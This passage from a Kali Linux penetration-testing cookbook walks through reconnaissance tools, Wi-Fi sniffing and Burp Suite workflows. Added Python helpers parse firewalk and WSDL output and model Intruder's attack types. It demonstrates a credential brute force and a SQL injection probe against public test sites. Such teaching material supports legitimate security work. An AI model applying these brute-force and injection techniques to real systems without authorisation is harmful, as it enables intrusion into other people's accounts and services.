2. Next, we try performing an email, whois, TCP port scan, and subdomain search by using the 
following: 


dmitry -s -e -w -p domain.com


The following screenshot shows the output of the preceding command: 


root@kali:~# dmitry -s -e -w -p google.com
Deepmagic Information Gathering Tool
"There be some deep magic going on"

HostIP:216.58.220.206
HostName:google.com

Gathered Inic-whois information for google.com
---------------------------------

Domain Name: GOOGLE.COM
Registrar: MARKMONITOR INC.
Sponsoring Registrar IANA ID: 292
Whois Server: whois.markmonitor.com
Referral URL: http://www.markmonitor.com
Name Server: NS1.GOOGLE.COM
Name Server: NS2.GOOGLE.COM
Name Server: NS3.GOOGLE.COM





Hunting for SSL flaws 


Most web applications today use SSL to communicate with the server. The sslscan tool is a great way to check SSL for flaws or misconfigurations.


How to do it... 


To learn about sslscan, follow the given steps:


1. We will look at the help manual to see the various options the tool has: 


sslscan -h

The following screenshot shows the output of the preceding command:

[Screenshot: the sslscan -h help output]


2. To run the tool against a host we type the following: 


sslscan host.com:port


The following screenshot shows the output of the preceding command: 


[Screenshot: sslscan output: the version header (built against OpenSSL 1.0.2), "Testing SSL server ..." and then one "... to heartbleed" verdict line per TLS version.]





See also 


- The A tale of a bleeding heart recipe from Chapter 5, Network Exploitation on Current Exploitation


TLSSLed is also an alternative we can use in Kali to perform checks on SSL. 


Exploring connections with intrace 


The intrace tool is a great tool to enumerate IP hops on existing TCP connections. It can be useful for 
firewall bypassing and gathering more information about a network. 


How to do it... 


Run the following command: 


intrace -h hostname.com -p port -s sizeofpacket


The following screenshot shows the output of the preceding command: 


root@kali:~# intrace -h google.com -p 443 -s 4





Digging deep with theharvester 


The theharvester tool is a great tool for penetration testing as it helps us find a lot of information about a 
company. It can be used to find email accounts, subdomains, and so on. In this recipe, we will learn how 
to use it to discover data. 


How to do it... 


The command is pretty simple: 


theharvester -d domain/name -l 20 -b all


The following screenshot shows the output of the preceding command: 


root@kali:~# theharvester -d packtpub -l 10 -b linkedin

*******************************************************************
[Screenshot: the theHarvester banner]
*******************************************************************

[-] Searching in Linkedin..





How it works... 


In the preceding recipe, -d is for the domain name or the keyword we want to search, -l limits the number of search results, and -b is the source we want the tool to use while gathering information. The tool supports Google, Google CSE, Bing, Bing API, PGP, LinkedIn, Google Profiles, people123, Jigsaw, Twitter, and Google Plus as sources.


Finding the technology behind web apps 


There is no point starting a pentest against a web application without knowing what the actual technology 
behind it is. For example, it would be absolutely useless to run dirsearch to look for files with the 
extension .php when the technology is actually ASP.NET. So, in this recipe, we will learn to use a simple 
tool whatweb to understand the technology behind a web app. It comes by default in Kali. 


It can also be installed manually from https://github.com/urbanadventurer/WhatWeb.


How to do it... 


whatweb is used as follows:


1. The tool can be launched by using the following command: 


whatweb


The following screenshot shows the output of the preceding command: 


[Screenshot: the WhatWeb ASCII-art banner, followed by:]

WhatWeb - Next generation web scanner version 0.4.8-dev.
Developed by Andrew Horton aka urbanadventurer and Brendan Coles
Homepage: http://www.morningstarsecurity.com/research/whatweb

Usage: whatweb [options] <URLs>





2. The domain name can be given as a parameter, or multiple domain names can be read from a file with the --input-file argument:

whatweb hostname.com


The following screenshot shows the output of the preceding command:

root@kali:~# whatweb google.com
[Screenshot: whatweb output for google.com]


Scanning IPs with masscan 


The masscan tool is an amazing tool; it is the fastest port scanner there is. It is claimed to be able to scan the entire internet when transmitting at 10 million packets per second. It is a good alternative to Nmap when we know exactly which ports we are looking for in a network.

Its usage is similar to Nmap's; however, it does not scan a default set of ports, so all the ports to scan must be specified using -p.


How to do it... 


The masscan tool is simple to use. We can begin a scan of a network by using the following command: 


masscan 192.168.1.0/24 -p 80,443,23


The following screenshot shows the output of the preceding command: 


root@kali:~# masscan 192.168.1.0/24 -p 80,443,23





We can also specify the packet rate by using --max-rate. By default, the rate is 100 packets per second. Raising it is not recommended, as it will put a lot of load on the network devices.


Sniffing around with Kismet 


Kismet is a layer 2 wireless network detector. It comes in handy because while performing pentest in a 
corporate environment, we may need to look for wireless networks as well. Kismet can sniff 
802.11a/b/g/n traffic. It works with any wireless card that supports raw monitoring modes. 


In this recipe, we will learn how to use Kismet to monitor Wi-Fi networks. 


How to do it... 


To learn about Kismet follow the given steps: 


1. We use the following command to launch Kismet: 


kismet


The following screenshot shows the output of the preceding command: 


[Screenshot: the Kismet client starting in the Terminal. A dialog reads: "Some terminals don't display some colors (notably, dark grey). The next line of text should read 'Dark grey text': Is it visible? If you answer 'No', dark grey will not be used in the default color scheme. Remember, you can always change colors to your taste by going to Kismet->Preferences->Colors. [ No ] [ Yes ]". The console behind it shows:]

INFO: Failed to load preferences file, will use defaults
INFO: Auto-connecting to tcp://localhost:2501
ERROR: Could not connect to Kismet server 'localhost:2501'
INFO: Welcome to the Kismet Newcore Client... Press '`' or '~' to activate menus.


2. Once the GUI is up, it will ask us to start the server, and we choose yes: 


[Screenshot: the Kismet client, still "Not Connected", repeating in its console:]

ERROR: Could not connect to Kismet server 'localhost:2501' (Connection refused) will attempt to reconnect in 5 seconds.


3. Next, we need to specify a source interface; in our case it is wlan0, so we type that. Make sure the interface is in monitor mode before initializing it in Kismet:


[Screenshot: the Kismet server console after starting it:]

INFO: Creating network tracker...
INFO: Reading config file '/root/.kismet//ssid_map.conf': 2 (No such file or directory)
INFO: Reading config file '/root/.kismet//tag.conf': 2 (No such file or directory)
INFO: Creating channel tracker...
INFO: Registering dumpfiles...
INFO: Pcap Log in PPI format
INFO: Opened pcapdump log file
INFO: Opened netxml log file
INFO: Opened nettxt log file
INFO: Opened gpsxml log file
INFO: Opened alert log file
INFO: Kismet starting to gather packets
ERROR: No packet sources defined. You MUST ADD SOME using the Kismet client, or by placing them in the Kismet config file (/usr/local/etc/kismet.conf)
INFO: Kismet server accepted connection from 127.0.0.1
ERROR: Could not connect to the GPSD server, will reconnect in 5 seconds
ERROR: Could not connect to the GPSD server, will reconnect in 5 seconds


4. Now we will see a list of all the wireless networks around us: 


[Screenshot: the Kismet main view listing the detected wireless networks]
5. By default, Kismet listens on all the channels, so we can specify a particular channel by selecting the 
entry Config Channel... from the Kismet menu: 





6. We can choose the channel number here: 







7. Kismet also allows us to see the signal to noise ratio. We can see that by selecting Channel Details... 
in the Windows menu: 







8. This signal to noise ratio is very helpful during times of wardriving: 





Testing routers with firewalk 


The firewalk tool is a network security reconnaissance tool that helps us figure out whether our routers are 
actually doing the job they are supposed to do. It attempts to find what protocols a router/firewall will 
allow and what it will block. 


This tool is incredibly useful during pentesting to verify and validate firewall policies in a corporate 
environment. 


How to do it... 


The following is the recipe for using firewalk: 


1. If firewalk is not found, we can install it using: 

    apt install firewalk 


2. We can use the following command to run firewalk: 

    firewalk -S1-23 -i eth0 192.168.1.1 192.168.10.1 


The following screenshot shows the output of the preceding command: 


[Screenshot: firewalk -S 1-23 -i eth0 192.168.1.1 192.168.10.1; Firewalk 5.0 [gateway ACL scanner]; Firewalk state initialization completed successfully; Ramping phase source port: 53, destination port: 33434]





How it works... 


In the preceding command, -i specifies the network interface, -S specifies the port numbers we want to 
test, and the next two arguments are the router's IP address and the IP address of the host behind it 
that we want to check against our router. 


Nmap also includes a script to perform firewalk. More information can be found at https://nmap.org/nsedoc/. 
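As an added example (not part of the book's recipe or of firewalk itself), the following script parses a firewalk report of the kind the recipe produces and compares each probed port against the ACL the gateway was supposed to enforce, so the finding becomes a concrete list of policy violations. The report and the intended policy are constructed for the example.

```python
"""Compare what firewalk observed with the ACL the gateway was supposed to enforce.

Added example, not part of the book's recipe or of firewalk itself. The
report below is constructed to follow firewalk's usual line format and is
not output captured from the 192.168.1.1 gateway in the recipe; the
intended policy is an assumed example.
"""
import re

# Constructed firewalk report for a TCP scan of ports 20-23 (firewalk -S20-23).
SAMPLE_REPORT = """\
Firewalk 5.0 [gateway ACL scanner]
Firewalk state initialization completed successfully.
TCP-based scan.
Ramping phase source port: 53, destination port: 33434
Hotfoot through 192.168.1.1 using 192.168.10.1 as a metric.
Ramping Phase:
 1 (TTL  1): expired [192.168.1.1]
Binding host reached.
Scan bound at 2 hops.
Scanning Phase:
port  20: *no response*
port  21: A! open (port not listen) [192.168.10.1]
port  22: A! open (port listener) [192.168.10.1]
port  23: *no response*
Scan completed successfully.
"""

# What the gateway's ACL is meant to do for traffic towards the metric host:
# True = the port should be passed through, False = it should be dropped.
INTENDED_POLICY = {20: False, 21: False, 22: True, 23: False}

PORT_LINE = re.compile(r"^port\s+(\d+):\s+(.*)$")


def parse_firewalk(report):
    """Map each probed port to 'passed' or 'blocked'.

    firewalk prefixes a probe that made it past the gateway with 'A!' (the
    metric host answered, whether or not anything listens there); a probe
    that drew no reply at all is printed as '*no response*', which means the
    gateway dropped it (or it was silently filtered somewhere on the path).
    """
    verdicts = {}
    for line in report.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            port, text = int(m.group(1)), m.group(2)
            verdicts[port] = "passed" if text.startswith("A!") else "blocked"
    return verdicts


def policy_violations(observed, intended):
    """Return (port, reason) for every port whose behaviour contradicts policy."""
    findings = []
    for port, should_pass in sorted(intended.items()):
        seen = observed.get(port)
        if seen is None:
            findings.append((port, "not covered by the scan"))
        elif should_pass and seen == "blocked":
            findings.append((port, "blocked, but the policy allows it"))
        elif not should_pass and seen == "passed":
            findings.append((port, "passed, but the policy blocks it"))
    return findings


if __name__ == "__main__":
    observed = parse_firewalk(SAMPLE_REPORT)
    for port, reason in policy_violations(observed, INTENDED_POLICY):
        print(f"port {port}: {reason}")
```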


Vulnerability Assessment 


In this chapter, we will cover the following recipes: 


Using the infamous Burp 
Exploiting WSDLs with Wsdler 
Using Intruder 
Web app pentest with Vega 
Exploring SearchSploit 
Exploiting routers with RouterSploit 
Using Metasploit 
Automating Metasploit 
Writing a custom resource script 
Databases in Metasploit 


Introduction 


In the previous chapters, we covered various recipes to collect information about our target. Now, once 
we have all that data, we need to start hunting for vulnerabilities. To become a good pentester, we need to 
make sure no small details are overlooked. 


Using the infamous Burp 


Burp has been around for years now; it is a collection of multiple tools built in Java by PortSwigger web 
security. It has various products, such as Decoder, Proxy, Scanner, Intruder, Repeater, and so on. Burp 
features an Extender, which allows a user to load different extensions that can be used to make pentesting 
even more efficient! You will learn about some of them in the upcoming recipes. 


How to do it... 


Let's take a look at how we can use Burp effectively: 


1. Kali already has a free version of Burp, but we will need a full version to fully use its features. So, 
we open up Burp: 


[Screenshot: Burp Suite Professional v1.7.15 start-up dialog with the options Temporary project, New project on disk and Open existing project; Cancel / Next]





2. Click on Start Burp and we will see the Burp load up: 


[Screenshot: Burp main window with the Target, Proxy, Spider, Scanner, Intruder, Repeater, Sequencer, Decoder, Comparer, Extender, Project options, User options and Alerts tabs; the Site map filter reads "Hiding not found items; hiding CSS, image and general binary content; hiding 4xx responses; hiding empty folders"]





3. Before we start hunting for bugs, we first install some extensions that may come in handy. Select 
BApp Store from the Extender menu: 


[Screenshot: Extender > BApp Store, "The BApp Store contains Burp extensions that have been written by users of Burp Suite"; the list (Name, Installed, Rating, Detail) includes NMAP Parser, Notes, Paramalyzer, ParrotNG, Payload Parser, Pcap Importer, PDF Metadata, PDF Viewer, Protobuf Decoder, Python Scripter, Random IP Address Header, Reflected Parameters, Reissue Request Scripter, Report To Elastic Search, Request Randomizer, Retire.js, SAML Editor, SAML Encoder / Decoder, SAML Raider, Sentinel, Session Auth, Session Timeout Test, Site Map Fetcher, Software Version Reporter, SQLiPy, ThreadFix, WCF Deserializer, WebInspect Connector, WebSphere Portlet State Decoder, What-The-WAF, WSDL Wizard, Wsdler and XSS Validator, some marked "Pro extension"]





4. We will see a list of extensions. Some of the extensions we will have to install are as follows: 
   • J2EEScan 
   • Wsdler 
   • Java Deserialization Scanner 
   • HeartBleed 
5. Click on Install after selecting each of these extensions. 


6. Once the extensions are all set, we prepare for scanning. We fire up a browser and go to its 
preferences: 


[Screenshot: Firefox preferences, Network tab: Connection, "Configure how Firefox connects to the Internet", Settings...]


7. In Network settings, we add our HTTP Proxy IP and Port: 


[Screenshot: Firefox "Configure Proxies to Access the Internet": Manual proxy configuration with HTTP Proxy 127.0.0.1 Port 8080 and "Use this proxy server for all protocols" checked (SSL Proxy, FTP Proxy and SOCKS Host all 127.0.0.1:8080, SOCKS v5); No Proxy for: localhost, 127.0.0.1; Cancel / OK]


8. We can verify this in the Options tab under Burp's Proxy tab: 

[Screenshot: Proxy > Options, Proxy Listeners ("Burp Proxy uses listeners to receive incoming HTTP requests from your browser. You will need to configure your browser to use..."); one running listener on interface 127.0.0.1:8080, certificate Per-host; Add / Edit / Remove]


9. Click on Intercept is on to start intercepting the requests: 


[Screenshot: Proxy > Intercept tab with "Intercept is on", showing a captured request to https://in.search.yahoo.com:443 with the Forward, Drop and Action buttons and the Raw / Params / Headers / Hex views]

10. Now we browse the website we need to scan. 
11. Once all requests are captured, we can simply go to Target and select our domain. 
12. To perform a scan, we can select individual requests and send them for an active scan: 









[Screenshot: Site map entries for http://testphp.vulnweb.com (GET /AJAX/index.php, /Mod_Rewrite_Shop/, /artists.php, /cart.php, ...) with the context menu for a selected request: Add to scope, Spider from here, Do an active scan, Do a passive scan]


13. Or, we can select the whole domain to send for an active scan: 


[Screenshot: Site map (filter: hiding not found items; hiding CSS, image and general binary content) with the host context menu for http://testphp.vulnweb.com/: Add to scope, Spider this host, Actively scan this host, Passively scan this host, Engagement tools, Compare site maps, Expand branch, Expand requested items, Delete host, Copy URLs in this host, Copy links in this host, Save selected items, Issues, View, Show new site map window, Site map help]


14. Once we have sent the requests to the Scanner, we will go to the Scanner tab and choose Options. 
Here, we can actually tell the scanner what exactly we want it to look for in our application: 


[Screenshot: Scanner > Options, Active Scanning Areas ("These settings control the types of checks performed during active scanning"): SQL injection (Error-based, Time-delay checks, Boolean condition checks, MSSQL-, Oracle- and MySQL-specific checks), OS command injection (Informed, Blind), Server-side code injection, Server-side template injection (requires reflected XSS), Reflected XSS, Stored XSS, Reflected DOM issues, Stored DOM issues, File path traversal / manipulation, External / out-of-band interaction, HTTP header injection, SMTP header injection, XML / SOAP injection, LDAP injection, Cross-site request forgery, Open redirection, Header manipulation, Server-level issues, Input returned in response (reflected), Input returned in response (stored)]


15. We can see the results of our scan in the Scan queue tab: 


[Screenshot: "Scan item 4 | 5 issues | 42% complete" with the issues SQL injection, Cross-domain Referer leakage, Email addresses disclosed and Frameable response (potential Clickjacking)]





16. The Scan queue tab can be seen in the following screenshot: 


[Screenshot: Scanner tabs Issue activity | Scan queue | Live scanning | Issue definitions | Options; the Scan queue table (#, Host, URL, Status) lists https://172.20.0.4:8090 and http://testphp.vulnweb.com with the URLs /login.xml, /categories.php, /listproducts.php, /AJAX/index.php, /Mod_Rewrite_Shop/, /artists.php, /cart.php, /comment.php, /disclaimer.php, /guestbook.php, /hpp/, /index.php, /login.php, /privacy.php, /product.php, /search.php, /showimage.php and /userinfo.php, with status values from 0% to 66% complete or "waiting"]


The following screenshot shows the results of the Scan queue tab in more detail: 


[Screenshot: "Scan item 4 | 5 issues | 42% complete | http://testphp.vulnweb.com/listproducts.php" with the Issues / Base request / Base response tabs; one check is marked "abandoned - too many errors"; the issues listed are SQL injection, Cross-domain Referer leakage, Email addresses disclosed and Frameable response (potential Clickjacking); the base request carries a Referer of http://testphp.vulnweb.com/categories.php]








While we are using only a few extensions here, you can view the whole list and choose 
your own extensions too. Extensions are easy to set up. 


Exploiting WSDLs with Wsdler 


Web Services Description Language (WSDL) is an XML-based language used to describe the 
functionality offered by a web service. Often while executing a pentest project, we may find a WSDL file 
out in the open, unauthenticated. In this recipe, we will look at how we can benefit from WSDL. 


How to do it... 


We intercept the request of WSDL in Burp: 


1. Right-click on the request and select Parse WSDL: 





[Screenshot: context menu on the request GET /ReceiverService.svc?wsdl HTTP/1.1: Send to Spider, Do an active scan, Send to Intruder, Send to Repeater, Send to Sequencer, Send to Comparer, Send to Decoder, Request in browser, Parse WSDL]








2. Switch to the Wsdler tab, and we will see all the service calls. We can see the complete request by 
clicking on any one of them: 


[Screenshot: the Wsdler tab (ReceiverService) listing Operation / Binding pairs: Insert, Update, GetStatus, SetStatus, SetPrimaryKey, GetPrimaryKey, SetTableName and GetTableName, all on BasicHttpBinding_IReceiverService, with a Raw / Hex request pane below]


3. To be able to play around with it, we will need to send it to the Repeater: 


[Screenshot: selecting GetStatus in the Wsdler operation list shows the generated request in the lower pane (Raw / Params / Headers / Hex / XML):]

POST /ReceiverService.svc HTTP/1.1 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:7.0.1) Gecko/20100101 Firefox/7.0.1 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-us,en;q=0.5 
Accept-Encoding: gzip, deflate 
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 
Connection: close 
SOAPAction: http://tempuri.org/IReceiverService/GetStatus 
Content-Type: text/xml;charset=UTF-8 
Host: (blanked out in the screenshot) 
Content-Length: 209 

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/"> 
   <soapenv:Header/> 
   <soapenv:Body> 
      <tem:GetStatus/> 
   </soapenv:Body> 
</soapenv:Envelope> 





4. We right-click and select Send to Repeater: 


[Screenshot: the generated GetStatus request (POST /ReceiverService.svc HTTP/1.1) with the context menu open: Send to Spider, Do an active scan, Send to Intruder, Send to Repeater, Send to Sequencer, Send to Comparer, Send to Decoder, Request in browser, Parse WSDL, Engagement tools]





5. In our case, we can see that putting a single quote throws up an error. And voila! We have an SQL 
injection possibility! 







The following screenshot shows the SQL injection: 


[Screenshot: the Repeater response is a SOAP fault: an <s:Fault> element with faultcode a:InternalServiceFault and the faultstring "Unterminated string. Expected delimiter: '. Path ' position 1.", followed by an exception detail block]


You will learn more about exploiting SQL in the later chapters of the book. 
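The enumeration Wsdler performs can be reproduced outside Burp. The following added example (not code from the book or from the Wsdler extension) parses a constructed, trimmed-down WSDL modelled on the IReceiverService contract in the screenshots, lists every bound operation with its SOAPAction and endpoint, and builds the same kind of skeleton request shown above; the endpoint host is a placeholder.

```python
"""List the operations a WSDL exposes and build the skeleton SOAP request for
one of them, which is what the Wsdler tab does in the recipe above.

Added example, not code from the book or from the Wsdler extension. The
WSDL below is a constructed, trimmed-down contract modelled on the
IReceiverService operations shown in the screenshots; the endpoint host is
a placeholder.
"""
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

NS = {
    "wsdl": "http://schemas.xmlsoap.org/wsdl/",
    "soap": "http://schemas.xmlsoap.org/wsdl/soap/",
}

SAMPLE_WSDL = """\
<wsdl:definitions xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
    xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
    xmlns:tns="http://tempuri.org/" targetNamespace="http://tempuri.org/">
  <wsdl:portType name="IReceiverService">
    <wsdl:operation name="GetStatus"/>
    <wsdl:operation name="SetStatus"/>
    <wsdl:operation name="Insert"/>
  </wsdl:portType>
  <wsdl:binding name="BasicHttpBinding_IReceiverService" type="tns:IReceiverService">
    <soap:binding transport="http://schemas.xmlsoap.org/soap/http"/>
    <wsdl:operation name="GetStatus">
      <soap:operation soapAction="http://tempuri.org/IReceiverService/GetStatus"/>
    </wsdl:operation>
    <wsdl:operation name="SetStatus">
      <soap:operation soapAction="http://tempuri.org/IReceiverService/SetStatus"/>
    </wsdl:operation>
    <wsdl:operation name="Insert">
      <soap:operation soapAction="http://tempuri.org/IReceiverService/Insert"/>
    </wsdl:operation>
  </wsdl:binding>
  <wsdl:service name="ReceiverService">
    <wsdl:port name="BasicHttpBinding_IReceiverService"
        binding="tns:BasicHttpBinding_IReceiverService">
      <soap:address location="http://receiver.example.invalid/ReceiverService.svc"/>
    </wsdl:port>
  </wsdl:service>
</wsdl:definitions>
"""


def list_operations(wsdl_text):
    """Return (binding, operation, SOAPAction, endpoint URL) for every bound operation."""
    root = ET.fromstring(wsdl_text)
    # <service>/<port> ties each binding to the URL it is served from.
    endpoints = {}
    for port in root.findall("wsdl:service/wsdl:port", NS):
        binding_name = port.get("binding", "").split(":")[-1]  # drop the tns: prefix
        address = port.find("soap:address", NS)
        endpoints[binding_name] = address.get("location") if address is not None else None
    operations = []
    for binding in root.findall("wsdl:binding", NS):
        name = binding.get("name")
        for op in binding.findall("wsdl:operation", NS):
            soap_op = op.find("soap:operation", NS)
            action = soap_op.get("soapAction", "") if soap_op is not None else ""
            operations.append((name, op.get("name"), action, endpoints.get(name)))
    return operations


def build_request(wsdl_text, operation, target_ns="http://tempuri.org/"):
    """Produce the HTTP request skeleton (no parameters filled in) for one operation."""
    matches = [o for o in list_operations(wsdl_text) if o[1] == operation]
    if not matches:
        raise KeyError(f"operation {operation!r} is not bound in this WSDL")
    _, _, action, endpoint = matches[0]
    url = urlsplit(endpoint)
    body = (
        '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" '
        f'xmlns:tem="{target_ns}">\n'
        "   <soapenv:Header/>\n"
        "   <soapenv:Body>\n"
        f"      <tem:{operation}/>\n"
        "   </soapenv:Body>\n"
        "</soapenv:Envelope>"
    )
    headers = (
        f"POST {url.path} HTTP/1.1\r\n"
        f"Host: {url.netloc}\r\n"
        f"SOAPAction: {action}\r\n"
        "Content-Type: text/xml;charset=UTF-8\r\n"
        f"Content-Length: {len(body.encode('utf-8'))}\r\n"
        "Connection: close\r\n\r\n"
    )
    return headers + body


if __name__ == "__main__":
    for binding, op, action, endpoint in list_operations(SAMPLE_WSDL):
        print(f"{op:<12} {binding}  {action}")
    print(build_request(SAMPLE_WSDL, "GetStatus"))
```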




Using Intruder 


Intruder is a great tool which allows us to perform different types of attacks that can be used to find all 
kinds of vulnerabilities. Some of the most common attacks that can be performed with Intruder are as 
follows: 


• Bruteforce 
• Fuzzing 
• Enumeration 
• Application layer DoS 


How to do it... 


We start off picking up a request from our captured requests: 


1. Right-click on the request and select Send to Intruder: 


















[Screenshot: Target > Site map for http://demo.testfire.net (Host, Method, URL, Params, Status columns; GET /bank/login.aspx, /, /cgi.exe, /default.aspx, /default.aspx?content=...); the POST /bank/login.aspx request (body uid=admin&passw=...) is selected and its context menu shows Send to Spider, Do an active scan, Do a passive scan, Send to Intruder, Send to Repeater, Send to Sequencer, Send to Comparer, Send to Decoder, Show response in browser, Request in browser, Engagement tools, Copy URL, Copy as curl command]


2. Switch to the Intruder tab. We need to specify a payload position, and we can do that by selecting the 
place we want or selecting the payload and clicking on the Add § button: 





[Screenshot: Intruder > Positions tab: Payload Positions ("Configure the positions where payloads will be inserted into the base request. The attack type determines the way in which payloads are assigned to payload positions"), Attack type: Sniper, the Add §, Clear §, Auto § and Refresh buttons, Start attack; 1 payload position, Length: 600]








3. In our case, since we are performing a login brute force, we will use the attack type Pitchfork: 

[Screenshot: the Attack type drop-down: Sniper, Battering ram, Pitchfork, Cluster bomb]





4. Next, we switch to the Payloads tab. This is where we will enter our payloads: 


[Screenshot: Intruder > Payloads tab, Payload Sets ("You can define one or more payload sets. The number of payload sets depends on the attack type defined in the Positions tab. Various payload types are available for each payload set, and each payload type can be customized in different ways"): Payload set: 1, Payload type: Simple list, Payload count: 0, Request count: 0]





5. We choose set 1, and as we are bruteforcing, we can choose a simple list as the Payload type. 
6. In the Payload options, we specify the list of words we want the app to be tested against. We can 
either enter them manually, or we can choose a pre-built list: 


[Screenshot: Payload Options [Simple list] ("This payload type lets you configure a simple list of strings that are used as payloads") with the entries admin, administrator, admin1, roger, james and packt, and the Paste, Load ..., Remove, Clear, Add and Add from list ... controls]


7. Now we choose set 2 and again specify a list of passwords we want the tool to try: 




















[Screenshot: Payload Options [Simple list] for payload set 2, filled in the same way with the Paste, Load ..., Remove, Clear, Add and Add from list ... controls]











8. Burp allows us to customize the attack by configuring options such as the Number of threads, the 
Redirections behaviour, and even a Grep - Match in the Options tab: 





[Screenshot: Intruder > Options tab: Store full payloads; Grep - Match ("These settings can be used to flag result items containing specified expressions"): Flag result items with responses matching these expressions: error, exception, illegal, invalid, fail, stack, access, directory, file, not found; Match type: Simple string / Regex; Case sensitive match; Exclude HTTP headers]


9. We click on Start attack: 





[Screenshot: Intruder attack results (Results | Target | Positions | Payloads | Options; Filter: Showing all items) with the columns Request, Payload1, Payload2, Status, Error, Timeout, Length, Comment: request 0 (base) status 200, length 9876; request 1 admin / password, 200, 9876; request 2 administrator / password@123, 200, 9884; request 4 roger / admin@123, 200, 9876; the request pane shows uid=admin&passw=...&btnSubmit=Login; status: Finished]








10. A new window will pop up, showing all the results of the attack performed. 


Here, we have used only one type of attack mode (Pitchfork). More can be learned about 
the different types of attack modes for Intruder at https://itstorm.github.io/blog/burp-suite-intruder-attack-types/. 
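Intruder's attack types differ only in how payload sets are mapped onto payload positions. The added example below (not code from Burp or from the book) reproduces that mapping for the login request used in the recipe and applies the recipe's Grep - Match terms to a constructed response; the template, the word lists and the response are all constructed.

```python
"""How Burp Intruder's four attack types turn payload sets into requests, and
how Grep - Match flags a response, for the login form used in the recipe above.

Added example, not code from Burp or from the book. The template, the two
word lists and the response are constructed; § marks a payload position just
as it does in Intruder's Positions tab.
"""
from itertools import product

# Constructed base request body with two payload positions (the § markers).
TEMPLATE = "uid=§admin§&passw=§password§&btnSubmit=Login"
USERNAMES = ["admin", "administrator", "roger"]
PASSWORDS = ["password", "password@123", "admin@123"]
# Grep - Match terms, a subset of those configured in the Options tab of the recipe.
GREP_TERMS = ["error", "exception", "invalid", "fail"]


def split_positions(template):
    """Split the template into [literal, base0, literal, base1, ..., literal]."""
    parts = template.split("§")
    if len(parts) % 2 == 0:
        raise ValueError("unbalanced § markers in template")
    return parts


def render(parts, values):
    """Rebuild the request with each position replaced by the matching value."""
    return "".join(parts[i] if i % 2 == 0 else values[i // 2]
                   for i in range(len(parts)))


def attack_requests(template, attack_type, payload_sets):
    """Return the request bodies Intruder would send for the given attack type."""
    parts = split_positions(template)
    base = parts[1::2]             # the original value at each position
    n = len(base)
    if attack_type == "sniper":
        # One set; each position is fuzzed in turn while the others keep their base value.
        (single,) = payload_sets
        combos = []
        for pos in range(n):
            for payload in single:
                values = list(base)
                values[pos] = payload
                combos.append(values)
    elif attack_type == "battering ram":
        # One set; the same payload goes into every position at once.
        (single,) = payload_sets
        combos = [[payload] * n for payload in single]
    elif attack_type == "pitchfork":
        # One set per position, walked in lock-step: request i uses set_k[i] for
        # position k, which is why it suits a list of username/password pairs.
        if len(payload_sets) != n:
            raise ValueError("pitchfork needs one payload set per position")
        combos = [list(row) for row in zip(*payload_sets)]
    elif attack_type == "cluster bomb":
        # One set per position; every combination (cartesian product) is tried.
        if len(payload_sets) != n:
            raise ValueError("cluster bomb needs one payload set per position")
        combos = [list(row) for row in product(*payload_sets)]
    else:
        raise ValueError(f"unknown attack type {attack_type!r}")
    return [render(parts, values) for values in combos]


def grep_match(response, terms, case_sensitive=False, exclude_headers=True):
    """Return the Grep - Match terms present in a response, in the order configured."""
    haystack = response
    if exclude_headers and "\r\n\r\n" in response:
        haystack = response.split("\r\n\r\n", 1)[1]
    if not case_sensitive:
        haystack = haystack.lower()
    return [t for t in terms if (t if case_sensitive else t.lower()) in haystack]


if __name__ == "__main__":
    for kind, sets in [("sniper", [USERNAMES]), ("battering ram", [USERNAMES]),
                       ("pitchfork", [USERNAMES, PASSWORDS]),
                       ("cluster bomb", [USERNAMES, PASSWORDS])]:
        reqs = attack_requests(TEMPLATE, kind, sets)
        print(f"{kind:<14} {len(reqs)} requests, first: {reqs[0]}")
    # Constructed response: the header mentions 'error' but only the body is grepped.
    sample = ("HTTP/1.1 200 OK\r\nX-Debug: no error\r\n\r\n"
              "<p>Login failed: invalid credentials</p>")
    print(grep_match(sample, GREP_TERMS))   # ['invalid', 'fail']
```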


Web app pentest with Vega 


Vega is an open source web app pentesting tool built in Java. It has a JavaScript-based API, which 
makes it even more powerful and flexible. Vega is pretty easy to use; in the following recipe, you will 
learn how to perform a scan with it. 


Getting ready 


Some Kali versions do not come with Vega installed, but it can be installed using the command: 


    apt-get install vega 


How to do it... 


1. Vega is built into Kali and can be started using this command: 

    vega 

The preceding command opens up the Vega tool: 


[Screenshot: the Subgraph Vega main window (File, Scan, Window, Help) with the Scanner and Proxy modes, and the Scan Info, Scan Alerts, Scan Alert Summary and Identities panes]


2. There are two ways to start a scan in Vega—by choosing either the scanner mode or the proxy mode. 
We look at the scanner mode here. 


3. We choose the Start New Scan options from the Scan menu: 


[Screenshot: the Scan menu: Start New Scan Ctrl+N, Edit Target Scope Ctrl+E]





4. In the window, we enter the website URL and click on Next: 


[Screenshot: "Select a Scan Target", "Choose a target for new scan": Enter a base URI for scan: testphp.vulnweb.com/; Choose a target scope for scan: Default; Web Model: "Include previously discovered paths from Web model" checked; Next / Cancel / Finish]


5. Then, we can choose the modules we want to run: 


[Screenshot: "Select modules to run": Injection Modules such as Bash Environment Variable Blind OS Injection (CVE-2014-6271), HTTP Trace Probes, Format String Injection Checks, Cross Domain Policy Auditor, XML Injection checks and Eval Code Injection]








6. In this step, we can enter the cookies: 


[Screenshot: Authentication Options, "Configure cookies and authentication identity to use during scan": Identity to scan site as; Set-Cookie or Set-Cookie2 value; Add cookie; Remove selected cookie(s)]


7. Next, we specify whether we want to exclude any parameters and then we click on Finish: 





[Screenshot: Scan Info with Scanner Progress for testphp.vulnweb.com: currently scanning http://testphp.vulnweb.com/cart.php, 3 out of 76 scanned (3.9%)]











8. We can see the results and vulnerabilities in the left-hand side pane: 

















[Screenshot: the Scan Alerts tree, scan of 12/31/2016 22:59:46, http://testphp.vulnweb.com: High (11), Medium (5), Low (2), Info (17)]


9. Clicking on an alert shows us the details: 


